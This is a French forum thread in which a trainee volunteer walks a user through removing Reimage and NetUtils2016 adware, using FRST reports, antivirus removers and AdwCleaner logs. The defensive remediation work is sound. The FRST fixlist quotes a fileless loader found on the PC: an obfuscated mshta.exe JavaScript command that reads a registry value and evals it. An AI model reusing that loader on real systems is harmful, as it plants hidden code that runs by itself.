Security-X
Forum Security-X => Désinfections => Discussion démarrée par: rzouga le mai 25, 2017, 20:31:05
-
Bonjour a tous besoin d'un coup de main pour supprimer reimage et netutils2016
Merci d'avance
-
Bonjour rzouga, :AAC
Ton PC a été infecté par un faux logiciel d'optimisation installant également des malwares.
=============================================================================
Je m'appelle Jonathan, je suis actuellement en formation sécurité: je vais te prendre en charge sur ton problème. Soit rassuré, toutes mes réponses seront validées par un expert en sécurité avant de te les envoyer.
Soit patient pour les réponses car j'ai une vie en dehors du forum. Merci de ta compréhension.
La désinfection se passeras en plusieurs étapes. Même si les symptômes semble avoir disparu, la désinfection ne seras terminée que lorsque je te le signalerais.
=============================================================================
Dans un premier temps, nous allons effectuer un diagnostic permettant de voir ce qui ne va pas sur ton ordinateur. Soit rassuré, aucunes informations confidentielles ne peuvent être lues par cette analyse.
/!\ Attention, ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\
Choisis ci-dessous la version compatible avec ton système (32 bits ou 64 bits)
En cas de doute sur ta version, clique sur ce lien: Comment savoir quelle version 32 bits ou 64 bits est exécutée sur mon système ? (http://windows.microsoft.com/fr-fr/windows7/find-out-32-or-64-bit)
Important, Enregistre le logiciel de diagnostic FRST sur ton Bureau et pas ailleurs, c'est important.
- Télécharge FRST 32 bits (http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/) de Farbar
- Télécharge FRST 64 bits (http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/) de Farbar
Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même
- Ferme toutes les applications, y compris ton navigateur
- Double-clique sur FRST.exe et clique sur Oui pour accepter le Disclaimer
/!\ Sous Vista, Windows 7 , 8.1 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
- Sur le menu principal, veille à ce que les cases demandées soient cochées puis clique sur Analyser et patiente le temps de l'analyse.
(https://up.security-x.fr/file.php?h=R25054e31dbe29bba6b5f60e9be895c0e)
- A la fin du scan, un rapport FRST.txt s'ouvre.
- A son premier lancement, l'outil va aussi créer un fichier nommé Addition.txt
- Héberge ces rapports sur ce site d'hébergement de fichiers (http://security-x.fr/up/)
- Appui sur Parcourir et cherche le rapport FRST.txt sur le bureau
- Clique sur Ouvrir
- Clique sur ENVOI,
- Puis copie/colle les liens fourni ICI dans ta prochaine réponse
- Fait de même pour le rapport additions.txt et shortcut.txt
- Les rapports sont enregistrés au même emplacement que l'outil, c'est à dire ton bureau et éventuellement sous C:\FRST\Logs
Aide en images pour l'hébergement des rapports (https://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)
Sont attendus les rapports:
FRST.txt
Additions.txt
Shortcut.txt
Jonathan
-
Bonsoir Jonathan, je t'ai posté les fichiers, tu les as reçu
je ne suis pas un féru d'informatique.
Merci de ta patience.
-
Jonathan, je viens de te renvoyer une nouvelle livrée des fichiers demandés FRST exécuté en admin.
Merci d'avance.
-
Bonsoir Rzouga,
Les rapports n'ont pas été envoyés. La procédure d'envoi est décrite sur ce lien (https://forum.security-x.fr/desinfections/reimage-et-netutils2016/)
Jonathan
-
Jonathan les as tu reçus?
-
Re,
Jonathan les as tu reçus?
:EEE Si tu ne me fournis pas les liens, je ne peux rien faire pour l'instant.
- Héberge ces rapports sur ce site d'hébergement de fichiers (http://security-x.fr/up/)
- Appui sur Parcourir et cherche le rapport FRST.txt sur ton bureau
- Clique sur Ouvrir
- Clique sur ENVOI,
- Puis copie/colle les liens fourni ICI dans ta prochaine réponse
- Fait de même pour le rapport additions.txt et shortcut.txt
- Les rapports sont enregistrés au même emplacement que l'outil, c'est à dire ton bureau et éventuellement sous C:\FRST\Logs
Aide en images pour l'hébergement des rapports (https://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)
-
Bonsoir Rzouga,
Des problèmes pour l'envoi des fichier.
Je te donne la procédure en image pour que tu comprennes mieux.
- Clique sur Upload
(https://up.security-x.fr/file.php?h=R7ef313542cc0221892df49d20fdf8129)
- Clique sur Parcourir
(https://up.security-x.fr/file.php?h=R7469b6a56eb6c0f5ce52f5b97ba6730a)
- Recherche le fichier frst.txt sur ton bureau puis clique sur ouvrir
(https://up.security-x.fr/file.php?h=Rc01128e64a2c8431454a0011a55e01b6)
- Clique sur Envoi
(https://up.security-x.fr/file.php?h=Rf5cc2449eaed7076ae19c4cd2689fa92)
- Fait un clic droit sur le lien puis sélectionne copier le raccourci
(https://up.security-x.fr/file.php?h=R5b712d50ea7e764ada07c1cdf5be6987)
- Dans ta réponse, fait un clique droit puis sélectionne coller
- Fait de même pour le fichier additions.txt et shortcut.txt
Jonathan
-
Bonsoir Jonathan ;
les liens des différents fichiers demandés
Merci d'avance.
frst
https://up.security-x.fr/file.php?h=Rc5c150583236417ffb5e8e22652ce3bc
additional
https://up.security-x.fr/file.php?h=R4002519a4b320a361010e423a1e157c5
shortcut
https://up.security-x.fr/file.php?h=R3fc5252a589cd09fb52fab24d0755764
-
Bonsoir Rzouga,
Bonsoir Jonathan ;
les liens des différents fichiers demandés
J'analyse les rapports et je reviens dés que possible. Soit patient.
Jonathan
:AAN
-
Bonjour Rzouga, :AAC
Des outils de désinfections sont présent sur ton PC (Adwcleaner, zhpcleaner, AdsFix, Zoek ...), c'est de ta propre initiative ou si tu as déjà été pris en charge ailleurs ?
Si affirmatif, joindre le lien de ce forum.
L'usage des outils de désinfections à titre personnel sans connaissance est un risque pour ton Pc.
Trace d'installation de plusieurs antivirus présent sur ton PC, lequel utilises-tu particulièrement ?
AVG, Kaspersky
Jonathan
:AAN
-
Bonsoir, Jonathan c'est moi qui a installé tout cela en regardant sur net dans l'espoir de faire quelque chose.
je ne suis pris en charge par personne.
Merci d'avance.
-
avg
-
Bonsoir Rzouga,
Il y eus plusieurs antivirus d'installés ou restes d'installation sur ton PC, cela présente un risque de conflit.
On supprime ceux-ci:
==> Suppression trace installation ESET avec l'outil ESET AV Remover:
- Télécharge l'outil de désinstallation ESET AV Remover 64 bits (http://download.eset.com/special/avremover/avremover_nt64_enu.exe) sur ton bureau.
- Fait un clic droit sur l'outil puis sélectionne Exécuter en tant qu'administrateur
- Suivre la procédure de désinstallation jusqu'à la fin
- Si redémarrage demandé, fait le
==> Désinstallation de Kaspersky Anti-Virus avec kavremover:
- Télécharge l'outil de désinstallation kavremover (http://media.kaspersky.com/utilities/ConsumerUtilities/kavremvr.exe) sur ton bureau.
- Fait un clic droit sur l'outil puis sélectionne Exécuter en tant qu'administrateur
- Suivre la procédure de désinstallation jusqu'à la fin
- Si redémarrage demandé, fait le
Aide en image sous la rubrique Utilisation de l'utilitaire (http://support.kaspersky.com/fr/common/service#block1)
Suppression des traces d'installation de de Norton avec Norton Remove:
- Télécharge l'outil de désinstallation Norton Remove (http://liveupdate.symantecliveupdate.com/upgrade/RnR/NRnR.exe) sur ton bureau.
- Fait un clic droit sur l'outil puis sélectionne Exécuter en tant qu'administrateur
- Suivre la procédure de désinstallation jusqu'à la fin.
- Si une demande de réinstallation d'un produit Norton est notifiée, refuse.
- Si redémarrage demandé, fait le
Aide (https://support.norton.com/sp/fr/fr/home/current/solutions/kb20080710133834EN_EndUserProfile_fr_fr)
Après la désinstallations des antivirus et redémarrages du PC, tu me refais une analyse FRST.
/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\
Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même
- Ferme toutes les applications, y compris ton navigateur
- Double-clique sur FRST.exe et clique sur Oui pour accepter le Disclaimer
/!\ Sous Vista, Windows 7 , 8.1 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
- Sur le menu principal, clique sur Analyser et patiente le temps de l'analyse.
(https://up.security-x.fr/file.php?h=Rc1263d0bf1614cbf273cb956bf5df104)
- A la fin du scan, un rapport FRST.txt s'ouvre.
- A son premier lancement, l'outil va aussi créer un fichier nommé Addition.txt
- Héberge ces rapports sur ce site d'hébergement de fichiers (http://security-x.fr/up/)
- Appui sur Parcourir et cherche le rapport FRST.txt sur le bureau
- Clique sur Ouvrir
- Clique sur ENVOI,
- Puis copie/colle les liens fourni ICI dans ta prochaine réponse
- Fait de même pour le rapport additions.txt
- Les rapports sont enregistrés au même emplacement que l'outil, c'est à dire ton bureau et éventuellement C:\FRST\Logs
Aide en images pour l'hébergement des rapports (http://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)
Pour l'hébergement, tu sais faire. Sinon, revoir la procédure en image.
Sont attendus, les rapports:
FRST.txt
Additions.txt
Jonathan
-
Bonsoir Jonathan, désolé de ne pas répondre rapidement.
voila les liens.
https://up.security-x.fr/file.php?h=R4d6a7547eb785548e1c40d094695b2f1
https://up.security-x.fr/file.php?h=R3b88dec70d21d5f615ab8f00dcd2bf3e
https://up.security-x.fr/file.php?h=R3dc17829f255c73d840c088bcd1ce9af
Merci beaucoup
-
Bonsoir Rzouga,
Bonsoir Jonathan, désolé de ne pas répondre rapidement.
voila les liens.
Merci beaucoup
Tu n'as pas à être désolé, le principale est que tu comprennes bien les procédures que je demande.
:sup: La désinstallation des antivirus c'est bien passé . J'analyse à nouveau les rapports et je reviens vers toi le plus tôt possible. Soit patient.
Jonathan
:AAN
-
Bonjour Rzouga, :AAC
- Effectue un mouvement de balayage vers le centre à partir du bord droit de l’écran, puis clique sur Rechercher
- Inscrit Panneau de configuration dans la zone de recherche et clique sur Panneau de configuration
- Clique sur programmes et fonctionnalités puis désinstalle les programmes suivant:
7-Zip 15.12 ==> (version obsolète)
Adobe AIR ==>(sauf si réelle utilité, tu le gardes)
HiJackThis ==> (inutile et obsolète)
QuickTime 7 ==> ( obsolète)
On supprime les lignes néfaste (suit à la lettre la procédure ci-dessous)
/!\ Attention, ce script a été établi uniquement pour le problème de cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnements et endommager Windows. Nous déclinons notre responsabilité en cas d'utilisation abusive malgré nos recommandations. /!\
/!\ Le correctif ne doit être lancés qu'une seule fois afin de ne pas fausser le rapport demandé. /!\
- Exécute FRST./!\ Attention, sous Vista, Windows 7, 8 et 10 , il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
- Clique sur les touches Ctrl + y afin d'ouvrir un fichier fixlist.txt vide
- Copie/colle la totalité du contenu de start à end dans la fenêtre qui vient de s'ouvrir. (clique sur sélectionner==> dans la zone mise en surbrillance bleue, clic droit puis copier. Dans le fenêtre du fichier fixlist, clic droit puis sélectionne coller)
Start
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> Pas de fichier
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> Pas de fichier
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> Pas de fichier
BootExecute: autocheck autochk * sh4native Sh4Removal
GroupPolicy: Restriction <======= ATTENTION
Toolbar: HKU\S-1-5-21-3058809429-2194307388-3191108243-500 -> Pas de nom - {A13C2648-91D4-4BF3-BC6D-0079707C4389} - Pas de fichier
Toolbar: HKU\S-1-5-21-3058809429-2194307388-3191108243-500 -> Pas de nom - {093F479D-712E-46CD-9E06-62E734A05F68} - Pas de fichier
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 - Pas de fichier
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] -
CHR HKU\S-1-5-21-3058809429-2194307388-3191108243-500\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] -
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] -
CHR Extension: (Pas de nom) - C:\Users\Administrateur\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhoibnponjcgjgcnfacekaijdbbplhib [2017-05-25]
R1 NetUtils2016; C:\Windows\system32\drivers\NetUtils2016.sys [909944 2017-05-25] () <==== ATTENTION
Task: {25D0DC08-3CF5-4220-BC63-31F8DFF2F767} - System32\Tasks\{7410B5F2-A275-447A-A9B4-D5BAF0DBFC83} => pcalua.exe -a "C:\Program Files\ByteFence\ByteFence.exe" -c /uninstall
Task: {267DCC1E-EA20-4BE6-B5A1-1A340338E5B9} - System32\Tasks\Norton Identity Safe\Norton Error Processor => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.11.42\SymErr.exe
Task: {291D4BA0-F835-475E-8A66-806FB8B1D9D2} - System32\Tasks\Norton Anti-Theft\Norton Error Processor => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.10.0.9\SymErr.exe
Task: {454955A5-0B82-4295-8106-19E9AAAD8B32} - \ProgramUpdateCheck -> Pas de fichier <==== ATTENTION
Task: {6755E7EF-247A-41C0-9416-3DC971A02FF8} - System32\Tasks\Norton Anti-Theft\Norton Error Analyzer => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.10.0.9\SymErr.exe
Task: {9ADEC0FD-E8AB-41B3-B524-D9A9F002F2D6} - \Run_Bobby_Browser -> Pas de fichier <==== ATTENTION
Task: {B957A9F8-0AA9-4437-B50A-654903AEA88B} - System32\Tasks\Norton Identity Safe\Norton Error Analyzer => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.11.42\SymErr.exe
Task: {DC27B515-9EFE-4E1B-BAC5-22A6BC1E8A45} - \{024412E1-9038-2129-0B11-5F58FCD6C3AF} -> Pas de fichier <==== ATTENTION
Task: C:\Windows\Tasks\{024412E1-9038-2129-0B11-5F58FCD6C3AF}.job => C:\Users\ADMINI~1\AppData\Roaming\Pefefupobe\UpdTask.exe <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Microsoft:9G3fVHcn41wKDFf3 [2224]
AlternateDataStreams: C:\ProgramData\Microsoft:ooyHWOfDrh2dKOEt0y89 [2466]
AlternateDataStreams: C:\ProgramData\Microsoft:v2RxrZagR1nbI3N8eQyqiX [2346]
AlternateDataStreams: C:\ProgramData\Microsoft:YRTJ0Fr9KqpgrD0C15SL1H [2146]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\89427363.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\89427363.sys => ""="Driver"
HKU\.DEFAULT\Software\Classes\2ef4: "C:\Windows\system32\mshta.exe" "javascript:g48fkq="E";bN8=new ActiveXObject("WScript.Shell");pfsOA9="Kz53l";Fm7J0e=bN8.RegRead("HKCU\\software\\ftvupj\\yyxeu");gkgt8A="gkynU";eval(Fm7J0e);uBoegW6A9="eDPvv0gv";" <===== ATTENTION
Shortcut: C:\Users\poupou\AppData\Local\Microsoft\Windows\Application Shortcuts\SymantecCorporation.NortonStudio_v68kp9n051hdp\App.lnk -> Tile and icon assets
ShortcutWithArgument: C:\Users\Administrateur\Start Menu\Programs\SpyHunter\SpyHunter Emergency Startup.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.com"
Shortcut: C:\Users\Administrateur\Start Menu\Programs\SpyHunter\SpyHunter.lnk -> C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe (Pas de fichier)
Shortcut: C:\Users\Administrateur\Start Menu\Programs\SpyHunter\Uninstall.lnk -> C:\Users\Administrateur\AppData\Roaming\Enigma Software Group\sh_installer.exe (Pas de fichier)
C:\Windows\system32\drivers\NetUtils2016.sys
2017-05-30 20:03 - 2016-12-27 22:31 - 00625272 _____ C:\Windows\system32\NetUtils2016.dll
2017-05-30 20:03 - 2017-05-30 20:06 - 00055896 _____ C:\Windows\ZAM.krnl.trace
2017-05-30 20:03 - 2017-05-30 20:06 - 00024773 _____ C:\Windows\ZAM_Guard.krnl.trace
2017-05-30 19:57 - 2017-05-30 20:00 - 00000000 ____D C:\Windows\System32\Tasks\Norton Remove and Reinstall
2017-05-30 19:53 - 2017-05-30 19:41 - 11646112 _____ (ESET) C:\Users\Administrateur\Desktop\avremover_nt64_enu.exe
2017-05-30 19:51 - 2017-05-30 19:45 - 14378312 _____ (Kaspersky Lab ZAO) C:\Users\Administrateur\Desktop\kavremvr.exe
2017-05-24 19:02 - 2017-05-30 19:52 - 00000000 ____D C:\ProgramData\Kaspersky Lab
2017-05-24 19:01 - 2017-05-24 19:01 - 00000000 ____D C:\ProgramData\Kaspersky Lab Setup Files
2017-05-11 13:06 - 2017-05-11 13:09 - 00000000 ____D C:\KVRT_Data
2017-05-11 13:06 - 2017-05-11 13:06 - 114225120 _____ (Kaspersky Lab ZAO) C:\Users\Administrateur\Downloads\KVRT.exe
C:\Program Files\ByteFence
C:\Program Files (x86)\Norton Identity Safe
C:\Program Files (x86)\Norton Anti-Theft
C:\Users\ADMINI~1\AppData\Roaming\Pefefupobe
C:\Program Files\Enigma Software Group
C:\Users\Administrateur\AppData\Roaming\Enigma Software Group
EmptyTemp:
End
- Clique sur les touche Ctrl + s pour enregistrer ce fichier (le fichier fixlist.txt est maintenant enregistré au même endroit que FRST).
- Ferme toutes les applications, y compris ton navigateur
- Clique sur Corriger et patiente le temps de la correction et ne fait rien d'autre.
- Le pc va demander à redémarrer, accepte cette condition.
- L'outil a créer un rapport de correction Fixlog.txt sur ton bureau, poste ce rapport sur https://up.security-x.fr/ et fourni le lien généré dans ta prochaine réponse.
Aide en images pour l'hébergement d'un rapport.
(http://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)
Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même
Jonathan
:AAN
-
Bonsoir Jonathan ; le lien
https://up.security-x.fr/file.php?h=R91489dea1bc863fbc532f64c7e977abc
Merci
-
Bonsoir Rzouga,
Ok pour le lien fourni. Une question concernant ton antivirus AVG Internet Security 2015, c'est la version gratuite ou tu disposes d'une licence ?
On continu la procédure de désinfection:
/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\
- Télécharge AdwCleaner (https://toolslib.net/downloads/viewdownload/1-adwcleaner/) de Malwarebytes sur ton bureau et pas ailleurs, clique sur Télécharger à droite de la fenêtre
- Patiente jusqu'à la proposition d'enregistrement (sans cliquer nul part ailleurs) et enregistre le fichier sur ton Bureau
- Ferme toutes les applications, y compris ton navigateur
- Double-clique sur l'icône AdwCleaner.exe pour lancer l'installation
/!\ Sous Vista, Windows 7 , 8.1 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
- Sur le menu principal, clique sur Analyser Attention de ne clique pas tout de suite sur Nettoyer, je te le signalerais explicitement car le rapport doit être analysé
- Les éléments détectés s'affichent dans les différents onglets. Clique sur Rapport
- Un rapport AdwCleaner(S).txt s'ouvre. Poste ce rapport dans ta prochaine réponse
Le rapport se trouve sous C:\AdwCleaner\AdwCleaner(Sx).txt
Sous IE et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions puis sur Exécuter quand même
Aide en image pour AdwCleaner (https://forum.security-x.fr/tutoriels-317/%28tutoriel%29-adwcleaner/)
:AAN
-
version gratuite
-
# AdwCleaner v6.047 - Logfile created 31/05/2017 at 22:28:06
# Updated on 19/05/2017 by Malwarebytes
# Database : 2017-05-31.2 [Server]
# Operating System : Windows 8.1 (X64)
# Username : Administrateur - RACHID
# Running from : C:\Users\Administrateur\Desktop\adwcleaner_6.047.exe
# Mode: Scan
# Support : https://www.malwarebytes.com/support
***** [ Services ] *****
Service Found: NetUtils2016
***** [ Folders ] *****
No malicious folders found.
***** [ Files ] *****
File Found: C:\Windows\SysNative\NetUtils2016.dll
File Found: C:\Windows\SysNative\drivers\NetUtils2016.sys
File Found: C:\Users\Administrateur\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_static.cmptch.com_0.localstorage
File Found: C:\Users\Administrateur\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_static.cmptch.com_0.localstorage-journal
***** [ DLL ] *****
No malicious DLLs found.
***** [ WMI ] *****
No malicious keys found.
***** [ Shortcuts ] *****
No infected shortcut found.
***** [ Scheduled Tasks ] *****
No malicious task found.
***** [ Registry ] *****
Key Found: [x64] HKLM\SOFTWARE\HDWallpaper
***** [ Web browsers ] *****
No malicious Firefox based browser items found.
No malicious Chromium based browser items found.
*************************
C:\AdwCleaner\AdwCleaner[C10].txt - [2898 Bytes] - [11/05/2017 08:36:24]
C:\AdwCleaner\AdwCleaner[C11].txt - [3629 Bytes] - [11/05/2017 12:03:01]
C:\AdwCleaner\AdwCleaner[C12].txt - [10841 Bytes] - [12/05/2017 21:48:07]
C:\AdwCleaner\AdwCleaner[C13].txt - [4336 Bytes] - [17/05/2017 20:50:47]
C:\AdwCleaner\AdwCleaner[C14].txt - [7041 Bytes] - [25/05/2017 20:10:10]
C:\AdwCleaner\AdwCleaner[C15].txt - [3971 Bytes] - [25/05/2017 20:19:48]
C:\AdwCleaner\AdwCleaner[C1].txt - [15507 Bytes] - [15/04/2016 05:00:01]
C:\AdwCleaner\AdwCleaner[C2].txt - [1535 Bytes] - [15/04/2016 21:31:41]
C:\AdwCleaner\AdwCleaner[C3].txt - [3504 Bytes] - [25/04/2016 15:58:51]
C:\AdwCleaner\AdwCleaner[C4].txt - [1021 Bytes] - [15/05/2016 17:46:01]
C:\AdwCleaner\AdwCleaner[C5].txt - [625 Bytes] - [15/05/2016 18:11:31]
C:\AdwCleaner\AdwCleaner[C6].txt - [2671 Bytes] - [19/05/2016 15:37:23]
C:\AdwCleaner\AdwCleaner[C7].txt - [2764 Bytes] - [04/06/2016 02:31:31]
C:\AdwCleaner\AdwCleaner[C8].txt - [13860 Bytes] - [11/05/2017 08:26:44]
C:\AdwCleaner\AdwCleaner[C9].txt - [2825 Bytes] - [11/05/2017 08:33:08]
C:\AdwCleaner\AdwCleaner[S10].txt - [6686 Bytes] - [18/12/2016 23:20:03]
C:\AdwCleaner\AdwCleaner[S11].txt - [14301 Bytes] - [14/02/2017 12:40:34]
C:\AdwCleaner\AdwCleaner[S12].txt - [12992 Bytes] - [11/05/2017 08:26:05]
C:\AdwCleaner\AdwCleaner[S13].txt - [2903 Bytes] - [11/05/2017 08:32:57]
C:\AdwCleaner\AdwCleaner[S14].txt - [2950 Bytes] - [11/05/2017 08:36:03]
C:\AdwCleaner\AdwCleaner[S15].txt - [3620 Bytes] - [11/05/2017 12:02:43]
C:\AdwCleaner\AdwCleaner[S16].txt - [9496 Bytes] - [12/05/2017 21:47:36]
C:\AdwCleaner\AdwCleaner[S17].txt - [4276 Bytes] - [17/05/2017 20:50:28]
C:\AdwCleaner\AdwCleaner[S18].txt - [3864 Bytes] - [24/05/2017 18:47:42]
C:\AdwCleaner\AdwCleaner[S19].txt - [7156 Bytes] - [25/05/2017 20:09:45]
C:\AdwCleaner\AdwCleaner[S1].txt - [15212 Bytes] - [15/04/2016 04:59:13]
C:\AdwCleaner\AdwCleaner[S20].txt - [4047 Bytes] - [25/05/2017 20:19:33]
C:\AdwCleaner\AdwCleaner[S21].txt - [3365 Bytes] - [31/05/2017 22:28:06]
C:\AdwCleaner\AdwCleaner[S2].txt - [1238 Bytes] - [15/04/2016 21:30:37]
C:\AdwCleaner\AdwCleaner[S3].txt - [3211 Bytes] - [25/04/2016 15:55:56]
C:\AdwCleaner\AdwCleaner[S4].txt - [1930 Bytes] - [15/05/2016 17:44:14]
C:\AdwCleaner\AdwCleaner[S5].txt - [1700 Bytes] - [15/05/2016 18:07:15]
C:\AdwCleaner\AdwCleaner[S6].txt - [2529 Bytes] - [19/05/2016 15:36:40]
C:\AdwCleaner\AdwCleaner[S7].txt - [4489 Bytes] - [04/06/2016 02:30:13]
C:\AdwCleaner\AdwCleaner[S8].txt - [6902 Bytes] - [14/12/2016 20:15:50]
C:\AdwCleaner\AdwCleaner[S9].txt - [12489 Bytes] - [14/12/2016 20:25:29]
C:\AdwCleaner\AdwCleaner[sczn du11052017.txt - [13863 Bytes] - [11/05/2017 08:31:21]
########## EOF - C:\AdwCleaner\AdwCleaner[S21].txt - [4110 Bytes] ##########
-
Bonjour Rzouga, :AAC
Concernant ton antivirus AVG Internet Security 2015, c'est la version gratuite ayant une validité d'un mois ou c'est la version gratuite simple?
Attention sur l'usage de l'outil Adwcleaner, tu l'as utilisé plusieurs fois: ce n'est pas sans risque car tu peux supprimer certains fichiers légitimes.
On effectue le nettoyage:
/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\
- Ferme toutes les applications, y compris ton navigateur
- Double-clique sur l'icône AdwCleaner.exe
/!\ Sous Vista, Windows 7 , 8.1 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
- Sur le menu principal, clique sur Analyser
- Les éléments détectés s'affichent dans les différents onglets. Clique sur Nettoyer et valide par OK la fermeture des programmes
- Patiente le temps de l'analyse et valide le message d'informations
- Un redémarrage est demandé, valider par OK
- Au redémarrage, un rapport AdwCleaner(C).txt s'ouvre. Poste ce rapport dans ta prochaine réponse
Le rapport se trouve sous C:\AdwCleaner\AdwCleaner(Cx).txt
Sous IE et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions puis sur Exécuter quand même
Héberge ce rapport sur ce site d'hébergement de fichiers (http://security-x.fr/up/) et indique les liens fournis dans ta réponse. Aide en images (http://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)
Si ton antivirus émet une alerte ou bloque l'outil, il faut le désactiver temporairement (le fichier AdwCleaner.exe est sûr)
Aide en image pour AdwCleaner (http://forum.security-x.fr/tutoriels-317/%28tutoriel%29-adwcleaner/)
Est attendus le rapport C:\AdwCleaner\AdwCleaner[C16].txt
Ensuite, on effectue un contrôle final:
/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\
Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même
- Ferme toutes les applications, y compris ton navigateur
- Double-clique sur FRST.exe et clique sur Oui pour accepter le Disclaimer
/!\ Sous Vista, Windows 7 , 8.1 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
- Sur le menu principal, clique sur Analyser et patiente le temps de l'analyse.
(https://up.security-x.fr/file.php?h=Rc1263d0bf1614cbf273cb956bf5df104)
- A la fin du scan, un rapport FRST.txt s'ouvre.
- A son premier lancement, l'outil va aussi créer un fichier nommé Addition.txt
- Héberge ces rapports sur ce site d'hébergement de fichiers (http://security-x.fr/up/)
- Appui sur Parcourir et cherche le rapport FRST.txt sur le bureau
- Clique sur Ouvrir
- Clique sur ENVOI,
- Puis copie/colle les liens fourni ICI dans ta prochaine réponse
- Fait de même pour le rapport additions.txt
- Les rapports sont enregistrés au même emplacement que l'outil, c'est à dire ton bureau et éventuellement C:\FRST\Logs
Aide en images pour l'hébergement des rapports (http://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)
Sont attendu le rapport:
FRST.txt
Additions.txt
C:\AdwCleaner\AdwCleaner[C16].txt
-
Bonsoir Jonathan, ci-joint le fichier :
# AdwCleaner v6.047 - Logfile created 01/06/2017 at 19:38:00
# Updated on 19/05/2017 by Malwarebytes
# Database : 2017-05-31.2 [Local]
# Operating System : Windows 8.1 (X64)
# Username : Administrateur - RACHID
# Running from : C:\Users\Administrateur\Desktop\adwcleaner_6.047.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support
***** [ Services ] *****
[-] Service deleted: NetUtils2016
***** [ Folders ] *****
***** [ Files ] *****
- File deleted: C:\Windows\SysNative\NetUtils2016.dll
[-] File deleted: C:\Windows\SysNative\drivers\NetUtils2016.sys
[-] File deleted: C:\Users\Administrateur\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_static.cmptch.com_0.localstorage
[-] File deleted: C:\Users\Administrateur\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_static.cmptch.com_0.localstorage-journal
***** [ DLL ] *****
***** [ WMI ] *****
***** [ Shortcuts ] *****
***** [ Scheduled Tasks ] *****
***** [ Registry ] *****
[-] Key deleted:
[x64] HKLM\SOFTWARE\HDWallpaper
***** [ Web browsers ] *****
*************************
:: "Tracing" keys deleted
:: Winsock settings cleared
*************************
C:\AdwCleaner\AdwCleaner[C10].txt - [2898 Bytes] - [11/05/2017 08:36:24]
C:\AdwCleaner\AdwCleaner[C11].txt - [3629 Bytes] - [11/05/2017 12:03:01]
C:\AdwCleaner\AdwCleaner[C12].txt - [10841 Bytes] - [12/05/2017 21:48:07]
C:\AdwCleaner\AdwCleaner[C13].txt - [4336 Bytes] - [17/05/2017 20:50:47]
